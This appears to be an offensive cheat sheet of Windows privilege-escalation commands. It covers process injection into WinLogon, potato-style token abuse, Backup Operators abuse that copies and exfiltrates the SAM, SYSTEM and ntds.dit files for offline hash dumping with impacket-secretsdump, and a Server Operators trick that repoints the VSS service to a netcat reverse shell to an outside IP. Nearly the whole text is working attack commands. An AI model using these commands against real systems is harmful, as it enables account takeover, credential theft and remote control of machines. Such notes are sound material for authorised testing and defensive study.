Windows Local Privilege Escalation
SeDebugPrivilege
Migrate PID to privileged process such as WinLogon
using ProcessInjection to load adopt.
WinLogon PID: 3488
Adopt binary: adopt.exe
PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe
SeImpersonatePrivilege
Usually Web (IIS) has this enabled.
- GodPotato, printerspoofer to Privesc.
BackupOperators
PS /bob> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt
Through Evil-Winrm (to upload/download files)
PS /bob> upload disk.txt C:\Windows\Temp\disk.txt
PS /bob> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /bob> E:
PS /bob> reg save hklm\system c:\windows\temp\system.bak
PS /bob> reg save hklm\sam c:\windows\temp\sam.bak
PS /bob> upload ./SeBackupPrivilegeCmdLets.dll
PS /bob> upload ./SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /bob> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /bob> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak
Then on your linux machine you use the 3 files you downloaded to dump the hashes
bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lnhash:nthash LOCAL -outputfile ntlm-extract
Server Operators
bobbuilder:/home# upload /usr/share/windows-resources/binaries/nc.exe
PS /bob> sc.exe config vss binPath="C:\Path\nc.exe -e cmd.exe ip 1234"
PS /bob> sc.exe stop vss
PS /bob> sc.exe start vss